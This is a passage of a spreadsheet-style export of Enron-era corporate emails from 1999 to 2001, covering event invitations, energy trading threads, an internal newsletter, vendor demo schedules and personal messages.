&gt; To: Carey Jordan; Buck Bequette; Jerry Paul; Jeff Rawls; Randall_x000D_
&gt; Posejpal; Kevin Fitzpatrick; John Frank Jr.; Eric Hendrick; Lisa Norwood;_x000D_
&gt; Ricky Archer; Reese Doggett; Michael Mellen; Dean Elkins; Danny Haskin;_x000D_
&gt; Peter Gilmore; David Itz; Kevin Benjamin; Trey  Lancaster, III_x000D_
&gt; Subject: Astros Opening Day Entry_x000D_
&gt;_x000D_
&gt; Please forward this e-mail to your customers invited to the Astros event._x000D_
&gt;_x000D_
&gt; Tomorrow is the big day!   The Astros are ready to beat the Milwaukee_x000D_
&gt; Brewers just for us!!  The game starts at 4:05 p.m. but our event starts_x000D_
&gt; two hours earlier so that you may watch batting practice, visit the Astros_x000D_
&gt; store, Ruggles or hang out in the Union Station Clubhouse and Rooftop._x000D_
&gt;_x000D_
&gt; Please meet me at the elevators beside the Union Station Ruggles.   As you_x000D_
&gt; enter Union Station, the Astros store will be to the right and Ruggles is_x000D_
&gt; to the left.   To the left of Ruggles is a set of elevators that will take_x000D_
&gt; us to the roof for food, drinks and great camaraderie!   I will be sitting_x000D_
&gt; by the elevators with your nametag, badge and ticket.   These were not_x000D_
&gt; handed out early just in case there were last-minute cancellations that_x000D_
&gt; someone else could step into the spot._x000D_
&gt;_x000D_
&gt; Tricia Monroe_x000D_
&gt; 713-830-8727_x000D_
&gt;  "Time is that quality of nature which_x000D_
&gt;  keeps events from happening all at_x000D_
&gt; once.  Lately it doesn't seem to be working."_x000D_
&gt; </t>
  </si>
  <si>
    <t>Tue, 19 Jun 2001 11:41:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tokens@lexcominc.net'})</t>
  </si>
  <si>
    <t>Arcade Equipment</t>
  </si>
  <si>
    <t>Hi Jim,_x000D_
_x000D_
The dimensions for the game are 68lx81Hx75.5w The Daytona twin is $4,999 for_x000D_
both units and 4295 for the Daytona 2 single seat. I originally quoted you_x000D_
44-4500 for the Daytona and was reading off the wrong line, I apologize for_x000D_
that.  To ship the Galaga/Ms Pacman is 275 to your door.  Keep in mind that_x000D_
the units breakdown and should fit through a 34 - 36 door._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Lutz</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 11:11:07 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: PGE Imbalance Charge</t>
  </si>
  <si>
    <t>Always.  By the way, did you have further thoughts about a call to develop a comprehensive Nevada strategy?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Monday, October 29, 2001 10:57 AM_x000D_
To:	Kaufman, Paul_x000D_
Subject:	RE: PGE Imbalance Charge_x000D_
_x000D_
Are we still friends??_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaufman, Paul  _x000D_
Sent:	Monday, October 29, 2001 11:44 AM_x000D_
To:	Steffes, James D._x000D_
Subject:	RE: PGE Imbalance Charge_x000D_
_x000D_
Thanks.  I hate it when I sound petulant.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Monday, October 29, 2001 9:12 AM_x000D_
To:	Kaufman, Paul; Nicolay, Christi L._x000D_
Subject:	RE: PGE Imbalance Charge_x000D_
_x000D_
My fault for not making it clear that you should have been in the loop.  We will send out a message across the board to help with this._x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaufman, Paul  _x000D_
Sent:	Monday, October 29, 2001 11:08 AM_x000D_
To:	Nicolay, Christi L.; Steffes, James D._x000D_
Subject:	RE: PGE Imbalance Charge_x000D_
_x000D_
This is going to sound like empire building. But I need to know what we're doing with PGE.  I don't need to participate in the calls--but I do need to know.  The PGE folks need to have confidence that I'm aware of our positions and plans.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nicolay, Christi L.  _x000D_
Sent:	Monday, October 29, 2001 9:04 AM_x000D_
To:	Steffes, James D._x000D_
Cc:	Kaufman, Paul_x000D_
Subject:	RE: PGE Imbalance Charge_x000D_
_x000D_
We are having a conference call tomorrow with PGE.  They did not decide anything on the last conference call after I told them why Enron retail in the East likes the Duquense type imbalance (no bandwidth, thus no penalties-- imbalances settle at verifiable system lambda).  John Malowney of EPMI west desk likes the bandwidth, but we are discussing it further since it has created problems for the East EES desk (due to the penalties associated with being outside the bandwidth).  John likes the PGE proposal to settle at an index price, but PGE is reconsidering that aspect.  _x000D_
_x000D_
Unfortunately, I don't know of any TPs that allow a bandwidth without penalties. _x000D_
_x000D_
Let me know if you want to participate in the call._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Monday, October 29, 2001 10:50 AM_x000D_
To:	Nicolay, Christi L._x000D_
Cc:	Kaufman, Paul_x000D_
Subject:	PGE Imbalance Charge_x000D_
_x000D_
Christi --_x000D_
_x000D_
What's the latest on the PGE imbalance method??_x000D_
_x000D_
Jim</t>
  </si>
  <si>
    <t>Var</t>
  </si>
  <si>
    <t>EFF_DT PORTFOLIO_ID DOWN95_x000D_
2/28/01  MANAGEMENT-COAL 0_x000D_
2/28/01  MANAGEMENT-CRD 0_x000D_
2/28/01  MANAGEMENT-GAS 854,693_x000D_
2/28/01  MANAGEMENT-PWR 164,563_x000D_
2/28/01  AGG-MANAGEMENT 964,254</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 05:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Con-Ed</t>
  </si>
  <si>
    <t>Con-Ed has 80,000 dt/d for Apr-Oct on the EBB for Transco.  Probably too late _x000D_
to bid on it.</t>
  </si>
  <si>
    <t>Thu, 13 Sep 2001 20:17:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
 _x000D_
_x000D_
BUSINESS HIGHLIGHTS _x000D_
_x000D_
Enron Global Markets - Coal and Emissions Trading _x000D_
The first Enron Online synfuel trade occurred this past week, establishing EnronOnline as the only online marketplace for synfuel.  The purpose of bringing synfuel on EnronOnline is to provide market transparency between the coal/synfuel spread.  _x000D_
_x000D_
The coal cash book, which began trading only two months ago, has traded over 2 million spot tons.  The fundamental purpose of this book is to capture short term market discrepancies, while also adding liquidity to the spot market to further long term trading and marketing of coal.  _x000D_
_x000D_
Enron Energy and Operational Services - ENA Solid Fuel Initiative _x000D_
ENA started development of a Coal Initiative late last year to support the electricity trading desk and to provide Enron with a hedge in the event that the cost of natural gas continues to escalate above current long term projections.  Because of the culture shock associated the use of the words  'Enron' and 'coal' in the same sentence, consideration was been given to changing the name to DNG (Dense Natural Gas); however, we went with Solid Fuel Initiative._x000D_
_x000D_
This initiative is developing multiple sites throughout the country where ENA feels there is the greatest opportunity for long term corporate benefit.  The primary areas are Texas, Florida, southeastern Ohio and the central Rocky Mountain Area.  There are 2 principal areas currently being aggressively pursued:  Brownsville, TX and Brighton FL.  In Brownsville, the Team secured formal Owner approval to lease a 600 acre site near the Brownsville Ship Channel.  This approval will allow the formal permitting activities to proceed without delay._x000D_
_x000D_
A 500 MW facility is being considered for Brownsville.  As conceptualized, it will consist of two - 250 MW (net) CFB units (Circulating Fluidized Bed) Boilers. The boilers will be fired by petroleum coke (petcoke) and use a technology that will generate electricity in the most environmentally friendly way currently possible.  One of the advantages of locating this facility near Brownsville is that it remains a steady growth area and there is already serious interest by others to take substantial initial base load capacity.  There is further synergy with other developing projects in the area that could lock down additional base capacity.  As stated the plant is initially 500 MW, but will be designed to be expanded to a 1000 MW facility._x000D_
_x000D_
The EEOS team is starting to grow and currently includes Hilda Akin &amp; Cheryl Kent, Project Admin Assistants, Bill Fox as PEM, and Paula Solomon as PCM.  As the project develops there will be more team members required.  In addition, as the Florida opportunity develops we plan to establish a separate team.   _x000D_
_x000D_
eSource _x000D_
eSource, Enron's research group, recently posted on its website a Forrester report as well as analyst reports for various industry and companies.  These reports are free and available to all Enron employees on the eSource Hot Topics page at http://esource.enron.com/hot_topics.asp &lt;http://esource.enron.com/hot_topics.asp&gt;.  To date, over 1,600 employees have downloaded "Spending Wisely on Private Hubs", a report valued at $2,000.  Over 1,100 employees to date have viewed the analyst reports, provided by Investext.  The reports, which are updated continuously, are presented in folders by company and industry.  New folders are being added upon request.  To submit a suggestion for a new folder, please complete the suggestion form at http://esource.enron.com/suggestion.asp &lt;http://esource.enron.com/suggestion.asp&gt;.  _x000D_
_x000D_
Watch for the new eSource bulletin, The Source.  It will feature frequently requested searches, tips on finding information, new products, services, and events._x000D_
_x000D_
Meanwhile, to further fulfill Enron's information needs, eSource has arranged for analysts and bureau chiefs of various organizations and publishing houses to offer seminars to Enron employees.  _x000D_
_x000D_
Enron Freight Markets _x000D_
EFM signed a firm contract with Streamline Shippers Association last week to provide truckload capacity for one-year with EFM's option to extend the contract for up to an additional year.  Streamline transloads international shipments that enter the U.S. through the ports of Long Beach and Los Angeles.  Streamline then consolidates the shipments into full truckloads destined to the major population centers throughout the country.  EFM will begin moving shipments to northeast destinations this week.  _x000D_
_x000D_
IN THE NEWS _x000D_
_x000D_
We are pleased to announce that Sally Beck has been named Chief Operating Officer for Enron Net Works.  She will join Greg Piper, President and Chief Executive Officer and Mark Pickering, Chief Technology Officer in the Enron Net Works Office of the Chair._x000D_
_x000D_
In her current role as Managing Director for Enron Net Works, Sally heads up Enron's Global Risk Management Operations.  She brings more than 20 years professional experience to Enron, joining the Company in 1992.  She graduated from the University of Texas at Austin with a B.B.A. in Marketing and an MBA with a concentration in Finance._x000D_
_x000D_
WELCOME _x000D_
New Hires _x000D_
EGM  - Robert Bogucki, Adam Gianonne _x000D_
EIM   - Sylvia Miller _x000D_
ENA  - Theresa McBride, Sriram Vasudevan, Jonathan McKay _x000D_
_x000D_
Transfers (to or within) _x000D_
ENA -Brandon Cavazos _x000D_
EGM - Michael Garcia _x000D_
_x000D_
NUGGETS &amp; NOTES _x000D_
_x000D_
Congratulations to Rahul Kumar for passing the CFA Level III Exam. _x000D_
_x000D_
Weather Risk Management _x000D_
The weather group is pleased to welcome several new people to their group.  Trevor Nathan and Norm Trethewey have joined the Australia office and Kaoru Hijikata has joined the Tokyo office. Please welcome them to our team._x000D_
_x000D_
EnronOnline Figures _x000D_
_x000D_
Below are the latest figures for EnronOnline as of September 7 _x000D_
_x000D_
	?       Total Life to Date Transactions &gt; 1,420,000 _x000D_
	?       Life to Date Notional Value of Transactions &gt; $809 billion _x000D_
_x000D_
Enron Best Practice Tips _x000D_
United Parcel Service (UPS) Delivers the Following Air Products: _x000D_
UPS Next Day Air Early A.M. - 8:30 a.m. to selected zip codes _x000D_
UPS Next Day Air - guaranteed by 10:30 a.m. _x000D_
UPS Next Day Air Saver - guaranteed by 3:00 p.m. _x000D_
UPS 2nd Day Air AM - guaranteed by 12:00 p.m. _x000D_
UPS 2nd Day Air - guaranteed by end of second day _x000D_
UPS 3-Day Select - guaranteed by end of third day _x000D_
UPS International Service - World-wide Express Plus, by 8:30 a.m. to select cities in Europe _x000D_
UPS World-wide Express - second business day _x000D_
_x000D_
For questions about selected cities and zip codes, please call the Enron Preferred Customer Associate at 800-432-2877. _x000D_
UPS is Enron's preferred vendor for express deliveries. _x000D_
_x000D_
_x000D_
LEGAL STUFF _x000D_
The information contained in this newsletter is confidential and proprietary to Enron Corp. and its subsidiaries.  It is intended for internal use only and should not be disclosed._x000D_
_x000D_
&lt;Embedded Paintbrush Picture&gt;</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 08:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.radous@enron.com', 'elizabeth.sager@enron.com', 'wendy.conwell@enron.com', 'sharen.cason@enron.com', 'edward.sacks@enron.com', 'veronica.gonzalez@enron.com'})</t>
  </si>
  <si>
    <t>RE: West deal</t>
  </si>
  <si>
    <t xml:space="preserve">this is fine.  thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Cason, Sharen  _x000D_
Sent: Thursday, May 31, 2001 1:57 PM_x000D_
To: Ngo, Tracy; Sacks, Edward; Gonzalez, Veronica; Sager, Elizabeth; Conwell, _x000D_
Wendy; Radous, Paul_x000D_
Subject: West deal_x000D_
_x000D_
Please review for credit approval._x000D_
_x000D_
Thanks!_x000D_
_x000D_
 &lt;&lt; File: sample.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 07:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cvavrek@deloitte.com', 'jeff.dasovich@enron.com', 'anil.sama@intel.com'})</t>
  </si>
  <si>
    <t>Re:RE: Here it is...</t>
  </si>
  <si>
    <t>I sent a reply a few hours ago.  I wonder if there is a problem with my_x000D_
e-mail._x000D_
_x000D_
_x000D_
I'm driving.  If you need a ride, let me know and I can meet you on Market_x000D_
and_x000D_
Beale._x000D_
_x000D_
**********************************************_x000D_
Mark D. Guinney, CFA_x000D_
Consultant_x000D_
Watson Wyatt Investment Consulting_x000D_
345 California Street, Ste. 1400_x000D_
San Francisco, CA  94104_x000D_
(415) 733-4487 ph._x000D_
(415) 733-4190 fax_x000D_
_x000D_
_x000D_
____________________Reply Separator_____________________x000D_
Subject:    RE: Here it is..._x000D_
Author: "Sama; Anil" &lt;SMTP:anil.sama@intel.com&gt;_x000D_
Date:       04/26/2001 5:07 PM_x000D_
_x000D_
Haven't heard from Mark yet... Am waiting to hear before_x000D_
printing and emailing to Tasker..._x000D_
_x000D_
Mark, Jeff: Are any of you driving over to campus from_x000D_
the city?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Vavrek, Carolyn (US - San Francisco) [mailto:cvavrek@deloitte.com]_x000D_
Sent: Thursday, April 26, 2001 12:45 PM_x000D_
To: Sama, Anil; 'Guinney, Mark'; 'Jeff.Dasovich@enron.com'_x000D_
Subject: RE: Here it is..._x000D_
_x000D_
_x000D_
Looks great to me (although the slide animation did not work on my machine_x000D_
so I can't comment on that)!_x000D_
_x000D_
If we are all in agreement, someone needs to e-mail Sarah a copy and print_x000D_
one out for her.  Can you do that Anil once you get an okay from Jeff and_x000D_
Mark?  Thanks for all the hard work._x000D_
_x000D_
See everyone around 5:30pm in Jimmy Bean's._x000D_
- cv_x000D_
_x000D_
Carolyn M. Vavrek_x000D_
Manager - Human Capital Advisory Services_x000D_
Deloitte &amp; Touche_x000D_
50 Fremont Street_x000D_
San Francisco, CA  94105_x000D_
_x000D_
phone: 415-783-5137_x000D_
fax: 415-783-8760_x000D_
e-mail: cvavrek@deloitte.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sama, Anil [mailto:anil.sama@intel.com]_x000D_
Sent: Thursday, April 26, 2001 11:41 AM_x000D_
To: 'Carolyn Vavrek'; 'Guinney, Mark'; 'Jeff.Dasovich@enron.com'_x000D_
Subject: Here it is..._x000D_
_x000D_
_x000D_
Hi Team,_x000D_
_x000D_
Here's the final cut._x000D_
_x000D_
I added hyperlinks to DCF sheets in backup as well as to_x000D_
trading comps and deal comps in the backup. And animation_x000D_
for slide turns._x000D_
_x000D_
Also, be sure to preview the 3-legged stool slide I added_x000D_
after valuations in slide presentation mode with sound_x000D_
enabled... Totally OK to remove it if any of you don't like_x000D_
it..._x000D_
_x000D_
&lt;&lt;E222_Mark_Quaker_presentation1.ZIP&gt;&gt;_x000D_
_x000D_
_x000D_
Any Qs, call me on my cell: 916 600 1245._x000D_
_x000D_
-Anil_x000D_
_x000D_
_x000D_
This message (including any attachments) contains confidential information_x000D_
intended for a specific individual and purpose, and is protected by law.  If_x000D_
you are not the intended recipient, you should delete this message and are_x000D_
hereby notified that any disclosure, copying, or distribution of this_x000D_
message, or the taking of any action based on it, is strictly prohibited.</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 05:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rosalyn.lum@enron.com', 'kristi.fredericks@enron.com', 'stephen.wolfe@enron.com', 'brian.dawson@enron.com', 'lisa.best@enron.com', 'stacy.hardy@enron.com', 'dana.davis@enron.com', 'tammy.barta@enron.com', 'susan.rance@enron.com', 'lisa.kang@enron.com', 'rufino.doroteo@enron.com', 'brad.carey@enron.com', 'hope.vargas@enron.com', 'marnie.lamb@enron.com', 'pam.becton@enron.com', 'brian.schwertner@enron.com', 'lisa.king@enron.com'})</t>
  </si>
  <si>
    <t>Co. 072R 12/00 Journal Vouchers</t>
  </si>
  <si>
    <t>Do any of you have Co. 72R  December Journal Vouchers?  I am trying to help _x000D_
Brian Dawson locate it._x000D_
_x000D_
Thanks for you help._x000D_
_x000D_
dd</t>
  </si>
  <si>
    <t>Tue, 7 Sep 1999 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andrea.bertone@enron.com', 'sara.shackleton@enron.com', 'don.black@enron.com', 'brent.hendry@enron.com', 'robert.george@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Everyone,_x000D_
_x000D_
Attached is the latest version of the captioned Schedule (revised 9/7/99)._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 23:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Devon</t>
  </si>
  <si>
    <t xml:space="preserve">will call you tonight_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Karen Arnold &lt;klarnold@flash.net&gt; on 03/27/2001 08:09:06 PM_x000D_
To: john.arnold@enron.com_x000D_
cc:  _x000D_
Subject: Devon_x000D_
_x000D_
_x000D_
Why did you sell Devon Energy???? I still own it.  should I sell?_x000D_
Any decision regarding your return?_x000D_
It is cold and rainy here, high today was 45!!!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 17:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephanie.harris@enron.com'})</t>
  </si>
  <si>
    <t>Meeting of the Association of General Counsel - The Greenbriar</t>
  </si>
  <si>
    <t>Meeting of the Association of General Counsel - The Greenbriar, White Sulphur _x000D_
Springs, West Virginia</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 22:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'russell.ballato@enron.com', 'larry.jester@enron.com', 'larry.campbell@enron.com', 'miguel.garcia@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'jay.wills@enron.com', 'rudy.acevedo@enron.com', 'wayne.herndon@enron.com', 'joe.errigo@enron.com', 'greg.trefz@enron.com', 'chad.starnes@enron.com', 'dean.laurent@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'doug.miller@enron.com', 'keller.mayeaux@enron.com', 'lawrence.clayton@enron.com', 'joe.stepenovitch@enron.com', 'cyril.price@enron.com'})</t>
  </si>
  <si>
    <t>Vendor Demos for ERCOT ISO</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kayne Coulter/HOU/ECT on 12/12/2000 06:22 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Felicia Doan_x000D_
12/11/2000 05:07 PM_x000D_
To: Rudy Acevedo/HOU/ECT@ECT, Diana Allen/Corp/Enron@ENRON, Russell _x000D_
Ballato/NA/Enron@Enron, Ted Ballinger/NA/Enron@Enron, Don _x000D_
Baughman/HOU/ECT@ECT, Edward D Baughman/HOU/ECT@ECT, Corry _x000D_
Bentley/HOU/ECT@ECT, Robert Benson/Corp/Enron@ENRON, Tamara Jae _x000D_
Black/HOU/ECT@ECT, Lisa Burnett/Corp/Enron@Enron, Paul J _x000D_
Broderick/HOU/ECT@ECT, Richard Broussard/Corp/Enron@Enron, Larry _x000D_
Campbell/ET&amp;S/Enron@ENRON, Mike Carson/Corp/Enron@Enron, Jason _x000D_
Choate/Corp/Enron@ENRON, Lawrence Clayton/Corp/Enron@Enron, Kevin _x000D_
Cline/Corp/Enron@Enron, Terri Clynes/HOU/ECT@ECT, Keith _x000D_
Comeaux/Corp/Enron@Enron, Karla Compean/HOU/ECT@ECT, Kayne _x000D_
Coulter/HOU/ECT@ECT, Jason Crawford/Corp/Enron@Enron, Mike Curry/HOU/ECT@ECT, _x000D_
Oscar Dalton/HOU/ECT@ECT, Mark Dana Davis/HOU/ECT@ECT, Clint _x000D_
Dean/Corp/Enron@Enron, Todd DeCook/Corp/Enron@Enron, George _x000D_
Diaz/Corp/Enron@ENRON, Felicia Doan/HOU/ECT@ECT, Chris Dorland/HOU/ECT@ECT, _x000D_
Tom Dutta/HOU/ECT@ECT, Joe Errigo/Corp/Enron@Enron, David _x000D_
Fairley/HOU/ECT@ECT, Miguel L Garcia/NA/Enron@ENRON, Gerald _x000D_
Gilbert/HOU/ECT@ECT, Doug Gilbert-Smith/Corp/Enron@ENRON, Joe _x000D_
Gordon/Corp/Enron@Enron, Gautam Gupta/HOU/ECT@ECT, Patrick Hanse/HOU/ECT@ECT, _x000D_
Brent Hebert/HOU/ECT@ect, Juan Hernandez/Corp/Enron@ENRON, Rogers _x000D_
Herndon/HOU/ECT@ect, Wayne Herndon/Corp/Enron@ENRON, George _x000D_
Hopley/HOU/ECT@ect, Jim Homco/HOU/ECT@ECT, Richard Hrabal/HOU/ECT@ect, Rika _x000D_
Imai/NA/Enron@Enron, Alton Jackson/Corp/Enron@Enron, Larry _x000D_
Jester/Corp/Enron@ENRON, Gary Justice/NA/Enron@Enron, Mike E _x000D_
Kelly/NA/Enron@Enron, Grace Kim/NA/Enron@Enron, Jeff King/Corp/Enron@Enron, _x000D_
John Kinser/HOU/ECT@ECT, Madhup Kumar/Corp/Enron@ENRON, Dean _x000D_
Laurent/HOU/ECT@ECT, Justin Laverell/Corp/Enron@ENRON, Chris _x000D_
Lenartowicz/Corp/Enron@ENRON, John Llodra/Corp/Enron@ENRON, Matt _x000D_
Lorenz/HOU/ECT@ECT, Gretchen Lotz/HOU/ECT@ECT, Peter Makkai/NA/Enron@Enron, _x000D_
Dave Mangskau/Corp/Enron@ENRON, Posey Martinez/HOU/ECT@ECT, Tom _x000D_
May/Corp/Enron@Enron, Keller Mayeaux/Corp/Enron@Enron, Doug _x000D_
Miller/Corp/Enron@Enron, Jeffrey Miller/NA/Enron@Enron, Narsimha _x000D_
Misra/NA/Enron@Enron, Christi L Nicolay/HOU/ECT@ECT, Steve _x000D_
Olinde/Corp/Enron@Enron, Andy Pace/NA/Enron@Enron, Juan _x000D_
Padron/NA/Enron@Enron, Ricardo Perez/NA/Enron@Enron, Joseph _x000D_
Piotrowski/NA/Enron@Enron, Laura Podurgiel/HOU/ECT@ECT, Kevin M _x000D_
Presto/HOU/ECT@ECT, Cyril Price/HOU/ECT@ECT, Joe Quenet/NA/Enron@Enron, Mitch _x000D_
Robinson/Corp/Enron@Enron, Bill Rust/HOU/ECT@ECT, David _x000D_
Ryan/Corp/Enron@ENRON, Eric Saibi/Corp/Enron@ENRON, Zachary _x000D_
Sampson/NA/Enron@ENRON, Anna Santucci/NA/Enron@Enron, Janelle _x000D_
Scheuer/HOU/ECT@ECT, Kyle Schultz/HOU/ECT@ECT, Erik Serio/Corp/Enron@Enron, _x000D_
Doug Sewell/HOU/ECT@ECT, Robert Stalford/NA/Enron@Enron, Chad _x000D_
Starnes/Corp/Enron@Enron, Joe Stepenovitch/Corp/Enron@Enron, Mark _x000D_
Symms/Corp/Enron@ENRON, Ramanarao Tamma/NA/Enron@Enron, James E _x000D_
Terrell/HOU/ECT@ECT, Garrett Tripp/TOR/ECT@ECT, Greg Trefz/Corp/Enron@ENRON, _x000D_
Larry Valderrama/HOU/ECT@ECT, Maria Valdes/Corp/Enron@Enron, Jewell _x000D_
Wade/NA/Enron@Enron, Joseph Wagner/NA/Enron@Enron, Christopher _x000D_
Watts/NA/Enron@Enron, Lloyd Will/HOU/ECT@ECT, Jay Wills/Corp/Enron@ENRON, _x000D_
George Wood/Corp/Enron@Enron, Richard Broussard/Corp/Enron@Enron, Keith _x000D_
Comeaux/Corp/Enron@Enron, Jason Crawford/Corp/Enron@Enron, George _x000D_
Diaz/Corp/Enron@ENRON, Brent Hebert/HOU/ECT@ect, Jim Homco/HOU/ECT@ECT, Alton _x000D_
Jackson/Corp/Enron@Enron, Justin Laverell/Corp/Enron@ENRON, Chris _x000D_
Lenartowicz/Corp/Enron@ENRON, Steve Olinde/Corp/Enron@Enron, Mitch _x000D_
Robinson/Corp/Enron@Enron, Erik Serio/Corp/Enron@Enron, Felicia _x000D_
Doan/HOU/ECT@ECT, Paul D Thomas/NA/Enron@Enron, Alan Chen/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: Vendor Demos for ERCOT ISO_x000D_
_x000D_
There will be Vendor Demos for ERCOT ISO on the following days:_x000D_
_x000D_
Day/Date  Time   Vendor Name    Location _x000D_
_x000D_
Tuesday, 12/12  9AM - 11:30AM  Altra/Majors Caldwell   EB3125B_x000D_
Tuesday, 12/12  3PM - 5PM  Structure Consulting/Loen Winstead EB3125B_x000D_
Wednesday, 12/13 9AM - 11:30AM  Alston ESCA/Lawrence Ferry  EB3125B_x000D_
Thursday, 12/14  9AM - 11:30AM  ABB/David L'Anson   EB3125B _x000D_
_x000D_
If you need additional information, please contact Madhup Kumar at ext. _x000D_
3-0608._x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
_x000D_
_x000D_
Felicia _x000D_
for Madhup Kumar_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Felicia Doan/HOU/ECT on 12/11/2000 04:51 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Madhup Kumar@ENRON_x000D_
12/08/2000 12:32 PM_x000D_
To: Lloyd Will/HOU/ECT@ECT, Thresa A Allen@ECT, Corry Bentley/HOU/ECT@ECT, _x000D_
Smith L Day/HOU/ECT@ECT, Steve Olinde/Corp/Enron@Enron, Doug _x000D_
Gilbert-Smith/Corp/Enron@ENRON, Mike Curry/HOU/ECT@ECT, Felicia _x000D_
Doan/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Vendor Demos for ERCOT ISO_x000D_
_x000D_
Following is the schedule for vendor demos for ERCOT ISO:_x000D_
_x000D_
12/12/00  9 am to 12pm   Tue day Altra   Majors Caldwell 713-419-3461_x000D_
12/12/00  3 pm to 5 pm Tue day Structure Consulting Loen Winstead  _x000D_
919-349-3997_x000D_
12/13/00  9  am to 12 pm  Wed day Alstom ESCA  Lawrence Ferry 206-465-3358_x000D_
12/14/00  9 am to 12 pm  Thurs day ABB   David I'Anson    919-621-5742_x000D_
_x000D_
_x000D_
Felicia will let us know the conf room._x000D_
_x000D_
Felicia, _x000D_
Please schedule the rooms at least 1 hr earlier so that vendors can setup the _x000D_
equipment. _x000D_
_x000D_
Thanks._x000D_
Madhup_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Nov 2001 07:41:18 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: [smu-betas] -kai-</t>
  </si>
  <si>
    <t xml:space="preserve">Zebes,  I can hear you AND a pin drop here in Atlanta!!_x000D_
_x000D_
C-Paul_x000D_
_x000D_
_________________________________________x000D_
Chuck Paul_x000D_
A Closer Look_x000D_
Professional Mystery Shopping Company_x000D_
770-446-0590_x000D_
Email: Chuck.Paul@A-Closer-Look.com_x000D_
http://www.a-closer-look.com_x000D_
_x000D_
-----Original Message-----_x000D_
From: Art Kretz [mailto:akretz@glasgowmedicalcenter.com]_x000D_
Sent: Thursday, November 08, 2001 10:35 AM_x000D_
To: smu-betas@yahoogroups.com_x000D_
Subject: Re: [smu-betas] -kai-_x000D_
_x000D_
Zebe's...... receiving you loud &amp; clear here in Delaware._x000D_
----- Original Message -----_x000D_
From: "Felix Zaremba &amp; Co., Inc." &lt;azaremba@fzci.net&gt;_x000D_
To: &lt;smu-betas@yahoogroups.com&gt;_x000D_
Sent: Thursday, November 08, 2001 9:46 AM_x000D_
Subject: Re: [smu-betas] -kai-_x000D_
_x000D_
_x000D_
&gt; Beeker :_x000D_
&gt;_x000D_
&gt; Please explain if there is/was any change in how our smu-betas e-mail_x000D_
group_x000D_
&gt; works._x000D_
&gt;_x000D_
&gt; Thanks, Alan Zaremba  #460_x000D_
&gt; ----- Original Message -----_x000D_
&gt; From: Fred D Haulenbeek &lt;FredinVt@juno.com&gt;_x000D_
&gt; To: &lt;smu-betas@yahoogroups.com&gt;_x000D_
&gt; Sent: Wednesday, November 07, 2001 8:57 PM_x000D_
&gt; Subject: [smu-betas] -kai-_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt; MOSE84@yahoo.com:_x000D_
&gt; &gt;_x000D_
&gt; &gt; you are now a member of e.wooglin.com_x000D_
&gt; &gt; congratulations_x000D_
&gt; &gt; it has become a custom for new members to introduce themselves to help_x000D_
us_x000D_
&gt; &gt; get acquainted._x000D_
&gt; &gt; something informative and entertaining would be terrific_x000D_
&gt; &gt; we look forward_x000D_
&gt; &gt; -kai-_x000D_
&gt; &gt; Beek_x000D_
&gt; &gt; #549_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Fred Haulenbeek_x000D_
&gt; &gt; 1195 Baldwin Road_x000D_
&gt; &gt; Hinesburg, Vermont     05461_x000D_
&gt; &gt;_x000D_
&gt; &gt; At Homecoming 2000, the BETA TENT had the biggest crowd by far.  Stay_x000D_
&gt; connected and consider a future homecoming BETA reunion.  It's_x000D_
&gt; incredible...forget the 20 years in between...everyone just seems to pick_x000D_
it_x000D_
&gt; up right where they left off years ago._x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Your use of Yahoo! Groups is subject to_x000D_
http://docs.yahoo.com/info/terms/_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt;_x000D_
